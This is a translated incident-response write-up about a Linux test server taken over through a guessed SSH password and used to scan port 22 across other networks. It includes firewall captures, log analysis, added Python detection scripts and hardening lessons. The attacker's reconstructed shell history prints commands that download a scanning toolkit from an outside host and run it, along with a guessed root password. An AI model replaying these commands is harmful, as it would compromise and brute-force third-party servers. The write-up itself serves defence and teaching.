The whole story of a Linux server turned into a "broiler" (zombie host)

Source: Internet
Author: User


    • The whole story of a Linux server turned into a "broiler" (zombie host)
      • 1 From the firewall collapse
      • 2 Ways to find the hacker's whereabouts
      • 3 Analysis of the compromise process
        • 3.1 Oracle user password cracked
        • 3.2 Reconstructing the hacker's actions
        • 3.3 Attack tools at a glance
      • 4 Profound lessons

1 From the firewall collapse

On March 10, 2015, before I had even arrived at the company, I got a call saying the office could not get onto the Internet: the network was very slow and web pages would not load. I hurried to the office and started looking for the problem.

A switch failure was ruled out first, because the internal LAN was working normally. Pinging the firewall device, however, showed severe packet loss. The firewall was obviously the problem and could not cope: its web management interface would not even log in properly. I immediately contacted the firewall's service provider to troubleshoot remotely. After nearly 3 hours of analysis, the conclusion was that two hosts on the network were sending a huge number of TCP packets, creating 400,000 connections on the firewall in an instant, far beyond its processing capacity, so it could no longer respond to normal routing requests. For now we call these two machines A and B. After the two machines were disconnected, the Internet returned to normal and the connection count on the firewall quickly dropped back to its normal level.

Host A is configured as follows:

    • OS: Red Hat Enterprise Linux Server release 6.3
    • Deployed software: Tomcat, sshd, Oracle
    • RAM: 4 GB
    • CPU: Intel Core i3-2130
    • IP address: 172.16.35.201 (mapped externally to 59.46.161.39)

Host B is a customer-managed host; its detailed configuration is unknown.

This article covers only the analysis and handling of host A.

A packet capture taken from the firewall's command-line interface showed host A frantically scanning port 22 across a range of IP addresses. Here is a fragment of the capture:

proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22, packet=3, bytes=208 [reply] 183.58.99.130:22=====>59.46.161.39:39895, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22, packet=3, bytes=208 [reply] 183.58.99.131:22=====>59.46.161.39:33967, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22, packet=3, bytes=208 [reply] 183.58.99.132:22=====>59.46.161.39:34117, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22, packet=3, bytes=208 [reply] 183.58.99.125:22=====>59.46.161.39:54932, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22, packet=3, bytes=208 [reply] 183.58.99.135:22=====>59.46.161.39:60333, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22, packet=3, bytes=208 [reply] 183.58.99.136:22=====>59.46.161.39:52737, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22, packet=3, bytes=208 [reply] 183.58.99.137:22=====>59.46.161.39:52291, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22, packet=3, bytes=208 [reply] 183.58.99.138:22=====>59.46.161.39:46183, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22, packet=3, bytes=208 [reply] 183.58.99.139:22=====>59.46.161.39:36864, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22, packet=3, bytes=208 [reply] 183.58.99.133:22=====>59.46.161.39:34515, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22, packet=3, bytes=208 [reply] 183.58.99.134:22=====>59.46.161.39:57121, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22, packet=3, bytes=208 [reply] 183.58.99.140:22=====>59.46.161.39:37830, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22, packet=3, bytes=208 [reply] 183.58.99.141:22=====>59.46.161.39:42742, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22, packet=3, bytes=208 [reply] 183.58.99.142:22=====>59.46.161.39:55018, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22, packet=3, bytes=208 [reply] 183.58.99.143:22=====>59.46.161.39:46447, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22, packet=3, bytes=208 [reply] 183.58.99.147:22=====>59.46.161.39:51039, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22, packet=3, bytes=208 [reply] 183.58.99.146:22=====>59.46.161.39:33123, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22, packet=3, bytes=208 [reply] 183.58.99.151:22=====>59.46.161.39:35956, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22, packet=3, bytes=208 [reply] 183.58.99.145:22=====>59.46.161.39:45002, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22, packet=3, bytes=208 [reply] 183.58.99.150:22=====>59.46.161.39:54711, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22, packet=3, bytes=208 [reply] 183.58.99.155:22=====>59.46.161.39:58976, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22, packet=3, bytes=208 [reply] 183.58.99.157:22=====>59.46.161.39:37967, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22, packet=3, bytes=208 [reply] 183.58.99.158:22=====>59.46.161.39:47125, packet=0, bytes=0
proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22, packet=3, bytes=208 [reply] 183.58.99.156:22=====>59.46.161.39:35028, packet=0, bytes=0

It is clear that the zombie's scanning program was sweeping port 22 across an entire network segment: three packets sent to each host, not a single packet received in reply.
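The half-open pattern in that capture (packets sent, zero reply packets, one destination after another on the same port) is easy to pick out mechanically. The following is an added example, not code from the original post: a small parser for the firewall's connection-table format shown above that groups records by source and reports any source touching many distinct hosts on one port without ever getting a reply. The field semantics (the packet count after `[reply]` being what the peer sent back) are assumed from the capture, and the records in `SAMPLE_DUMP` are constructed to mirror it.

```python
"""Flag a host that sweeps one TCP port across many destinations, using the
firewall connection-table format shown above.  Added example; the records
below are constructed to mirror the page's capture."""
import re

# One connection per record: the initiator's packet count comes before
# "[reply]", the peer's answering packet count after it.  Case-insensitive
# because the raw capture mixes "packet=" and "Packet=".
RECORD_RE = re.compile(
    r"(?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+)=====>"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+),\s*packet=\s*(?P<sent>\d+),"
    r".*?\[reply\].*?packet=\s*(?P<replied>\d+)",
    re.IGNORECASE,
)


def parse_records(dump):
    """Yield (src, dst, dport, sent, replied) for each record in the dump.
    Works on the raw run-together dump as well as one record per line."""
    for m in RECORD_RE.finditer(dump):
        yield (m["src"], m["dst"], int(m["dport"]),
               int(m["sent"]), int(m["replied"]))


def sweep_suspects(records, min_targets=10):
    """Return {(src, dport): n} for every source that contacted at least
    min_targets distinct destinations on one port without receiving a single
    reply packet (the half-open signature of a port sweep)."""
    targets = {}
    for src, dst, dport, sent, replied in records:
        if replied == 0 and sent > 0:
            targets.setdefault((src, dport), set()).add(dst)
    return {key: len(dsts) for key, dsts in targets.items()
            if len(dsts) >= min_targets}


def _record(src, sport, dst, dport, sent, replied):
    """Build one record in the firewall's format (constructed sample data)."""
    return (f"proto=6 TCP tcp_ns_established,status:00001198,left_time:0s,"
            f"{src}:{sport}=====>{dst}:{dport}, packet= {sent}, bytes=208[reply] "
            f"{dst}:{dport}=====>59.46.161.39:{sport}, packet={replied}, bytes=0")


# Constructed dump: twelve unanswered probes of tcp/22 on consecutive hosts
# from 172.16.35.201, plus one healthy session from another internal host.
SAMPLE_DUMP = "\n".join(
    [_record("172.16.35.201", 39000 + i, f"183.58.99.{130 + i}", 22, 3, 0)
     for i in range(12)]
    + [_record("172.16.35.88", 50123, "10.10.10.1", 22, 41, 38)]
)


def analyse(dump=SAMPLE_DUMP, min_targets=10):
    """Parse a dump and return the sweep suspects found in it."""
    return sweep_suspects(parse_records(dump), min_targets)


if __name__ == "__main__":
    for (src, port), n in analyse().items():
        print(f"{src} hit {n} hosts on tcp/{port} without a single reply")
```

The threshold of ten distinct targets is arbitrary; what matters is that the healthy session (41 packets out, 38 back) never counts, so a busy but legitimate host does not trip the check.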

2 Ways to find the hacker's whereabouts

For Linux hosts, post-incident analysis and handling rely primarily on logs.

/var/log/messages and /var/log/secure are indispensable analysis targets, followed by the .bash_history command record.

A hacker who logs in to the host must leave a record in the logs. Advanced hackers may delete their traces, but at present most attackers are people using off-the-shelf tools with little technical background.

The host has three TCP listening ports open:

    • sshd
    • Tomcat
    • Oracle (1521)

All three services can be attacked. The one most easily hit by a scan is sshd, by cracking a username and password. So the first step is to analyze the /var/log/secure log and look at the login history.

3 Analysis of the compromise process

3.1 Oracle user password cracked

Analyzing /var/log/secure gave me a shock: the log already filled four files, each recording a large number of login attempts. Run the command:

grep 'Failed password' secure-20150317 | cut -d ' ' -f 9,10,11 | sort | uniq

Output:

invalid user admin
invalid user dacx
invalid user details3
invalid user drishti
invalid user ferreluque
invalid user git
invalid user hall
invalid user jparksu
invalid user last
invalid user patrol
invalid user paul
invalid user pgadmin
invalid user postgres
invalid user public
invalid user sauser
invalid user siginspect
invalid user sql
invalid user support
invalid user sys
invalid user sysadmin
invalid user system
invalid user taz
invalid user test
invalid user tiptop
invalid user txl5460
invalid user ubnt
invalid user www
mysql from 10.10.10.1
oracle from 10.10.10.1
root from 10.10.10.1
It can be seen that the attacking program kept trying different accounts and passwords.

Near the tail, the following 2 lines are found, which show the breach:

Mar  9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2
Mar  9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)

Clearly the oracle account's password was guessed and the attacker successfully logged in to the system.
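The grep/cut/sort/uniq pipeline above lists which accounts were tried; what actually identified the breach was reading further down for an "Accepted password" line from the same source that had been failing. Here is an added example, not part of the original post, that does both steps over sshd log lines: it counts failed attempts per (source, user) and flags any accepted password login whose source had already failed a number of times. The regexes follow the standard OpenSSH message formats shown above, and the lines in `SAMPLE_SECURE` are constructed.

```python
"""Find the page's compromise signature in /var/log/secure: a burst of failed
sshd logins from one source followed by an accepted password login from that
same source.  Added example, not part of the original post; the log lines are
constructed in the OpenSSH message format the page shows."""
import re
from collections import Counter, defaultdict

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<src>\S+) port \d+")

# Constructed sample: five guesses against different accounts, one legitimate
# key-based login from another host, then the password login that succeeded.
SAMPLE_SECURE = """\
Mar  9 20:31:02 localhost sshd[30201]: Failed password for invalid user admin from 10.10.10.1 port 51022 ssh2
Mar  9 20:31:05 localhost sshd[30203]: Failed password for invalid user postgres from 10.10.10.1 port 51040 ssh2
Mar  9 20:31:09 localhost sshd[30210]: Failed password for root from 10.10.10.1 port 51055 ssh2
Mar  9 20:31:14 localhost sshd[30214]: Failed password for oracle from 10.10.10.1 port 51071 ssh2
Mar  9 20:31:20 localhost sshd[30219]: Failed password for oracle from 10.10.10.1 port 51090 ssh2
Mar  9 20:33:41 localhost sshd[30350]: Accepted publickey for deploy from 172.16.35.10 port 40122 ssh2
Mar  9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2
Mar  9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)
"""


def failed_attempts(lines):
    """Count failed password attempts per (source, user): the equivalent of the
    grep | cut | sort | uniq pipeline, but keeping the counts."""
    counts = Counter()
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            counts[(m["src"], m["user"])] += 1
    return counts


def suspicious_logins(lines, threshold=3):
    """Return (user, src, failures_before) for every accepted *password*
    login whose source had already failed at least threshold times.  Key-based
    logins are ignored: a key cannot be guessed this way."""
    failures = defaultdict(int)
    hits = []
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            failures[m["src"]] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m and m["method"] == "password" and failures[m["src"]] >= threshold:
            hits.append((m["user"], m["src"], failures[m["src"]]))
    return hits


def analyse(text=SAMPLE_SECURE, threshold=3):
    """Run both checks over a log text; returns (attempt counts, hits)."""
    lines = text.splitlines()
    return failed_attempts(lines), suspicious_logins(lines, threshold)


if __name__ == "__main__":
    counts, hits = analyse()
    for (src, user), n in sorted(counts.items()):
        print(f"{n:3d} failed  {user:<10} from {src}")
    for user, src, n in hits:
        print(f"ALERT: password login as {user} from {src} after {n} failures")
```

Run against the real secure-* files one after another (the counters carry over within a single text, so concatenate the rotated files in date order first) and the one "Accepted password" that mattered here surfaces with the number of guesses that preceded it.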

3.2 Reconstructing the hacker's actions

Now let's look at what the hacker did with the oracle account. First copy oracle's command history so the record cannot be lost:

cp /home/oracle/.bash_history hacker_history

Then analyze this file. My comments on the hacker's intent follow each command in parentheses.

    vi .bash_profile
    vi .bash_profile  (reads .bash_profile, checks the variable settings, adds /home/oracle/bin to PATH)
    ll
    cd /
    vi .bash_profile
    vi .bash_profile  (applies the environment-variable setting)
    w
    ps x  (views the running processes)
    free -m  (views the memory size)
    uname -a  (views the kernel version)
    cat /etc/issue  (views the system release)
    cat /etc/hosts  (looks for other machines on the internal network)
    cat /proc/cpuinfo  (views the CPU model)
    cat .bash_history  (views the oracle account's past commands)
    (views the system load)
    ls -a  (views the hidden files under /home/oracle/)
    passwd  (changed the oracle account's password)
    exit
    ls
    oracle
    sqlplus  (runs sqlplus)
    su  (tries to switch to the root account)
    app1123456  (guessing the root password)
    su -
    w
    free -m
    php -v  (views the PHP version)
    exit
    w
    free -m
    php -v
    ps aux
    ls -a /
    exit
    w
    ps x
    free -m
    php -v
    cat .bash_history  (views the command history)
    cat .bash_history
    cat .bash_history
    wget scriptcoders.ucoz.com/piata.tgz  (downloads the broiler attack package)
    tar zxvf piata.tgz  (unpacks the package)
    rm -rf piata.tgz  (deletes the package)
    cd piata/  (enters the attack tool folder)
    ls -a
    chmod +x *
    ./a 210.212  (runs the attack tool)
    screen  (tried to run the screen command, found it missing, then downloaded it)
    ls -a
    wget scriptcoders.ucoz.com/screen.tgz
    tar zxvf screen.tgz  (unpacks it)
    ./screen
    cd piata/  (enters the attack tool folder)
    ls -a
    cat vuln.txt  (views the attack results)
    ls -a
    mv vuln.txt 1.txt  (saves the attack results)
    ./screen -r
    nano 1.txt  (views the result file)
    ps x
    cd piata
    ps x
    ls -a
    nano 2.txt
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    mv vuln.txt 2.txt  (saves the results)
    nano 2.txt
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    rm -rf vuln.txt
    ./screen -r
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    ls -a
    mv vuln.txt 3.txt  (saves the results)
    nano 3.txt
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    rm -rf vuln.txt
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    rm -rf vuln.txt
    rm -rf 1.txt
    rm -rf 2.txt
    rm -rf 2.txt.save
    rm -rf 3.txt
    screen -r
    ./screen -r
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    ls -a
    nano vuln.txt
    rm -rf vuln.txt
    screen -r
    ./screen -r
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    nano vuln.txt
    w
    ls -a
    rm -rf vuln.txt
    screen -r
    ./screen -r
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    rm -rf vuln.txt
    ps x
    ls -a
    ./screen -r
    exit
    w
    ps x
    cd piata/
    ls -a
    cat vuln.txt
    nano vuln.txt
    w
    rm -rf vuln.txt
    ./screen -r
    exit
3.3 Attack tools at a glance

The command history above shows that the attack tool package is named piata.

Let's pull it down and look at what it contains:

[root@localhost piata]# ll
total 1708
-rw-r--r--. 1 oracle oinstall      0 Mar 10 13:01 183.63.pscan.22
-rwxr-xr-x. 1 oracle oinstall    659 Feb  2  2008 a
-rwxr-xr-x. 1 oracle oinstall    216 May 18  2005 auto
-rwxr-xr-x. 1 oracle oinstall    283 Nov 25  2004 gen-pass.sh
-rwxr-xr-x. 1 oracle oinstall     93 Apr 19  2005 go.sh
-rwxr-xr-x. 1 oracle oinstall   3253 Mar  5  2007 mass
-rwxr-xr-x. 1 oracle oinstall  12671 May 18  2008 pass_file
-rwxr-xr-x. 1 oracle oinstall  21407 Jul 22  2004 pscan2
-rwxr-xr-x. 1 oracle oinstall 249980 Feb 13  2001 screen
-rw-r--r--. 1 oracle oinstall 130892 Feb  3  2010 screen.tgz
-rwxr-xr-x. 1 oracle oinstall 453972 Jul 13  2004 ss
-rwxr-xr-x. 1 oracle oinstall 842736 Nov 24  2004 ssh-scan
-rw-r--r--. 1 oracle oinstall   2392 Mar 10 05:03 vuln.txt

a, auto, go.sh and gen-pass.sh are bash scripts that set the network segment to scan and invoke the scanner. pscan2 and ssh-scan are the scanning programs. vuln.txt records the list of compromised hosts ("chickens") obtained.

So far no other system files have been found to be tampered with by the hacker, and there is no setting that would start the attack software on its own.

4 Profound lessons

Although the attacked machine is only a test host of little importance in itself, it paralyzed the firewall and took down Internet access for everyone. This deserves serious attention, and lessons must be learned from it.

    • System account passwords must have a certain degree of complexity.

      This attack was caused by the oracle account's overly simple password.

    • Password-based login to sshd carries a very high risk, especially when the password is simple. If at all possible, disable password login and use public-key authentication instead.

    • As the data center administrator, one must supervise the system administrators' and software developers' service security. The attacked host had been handed over entirely to the website development company, but that company paid no attention to operational security.

The above is the case of host A. Host B is a hosted customer host over which I have no administrative authority; I am now waiting for the customer's inspection and remediation report.

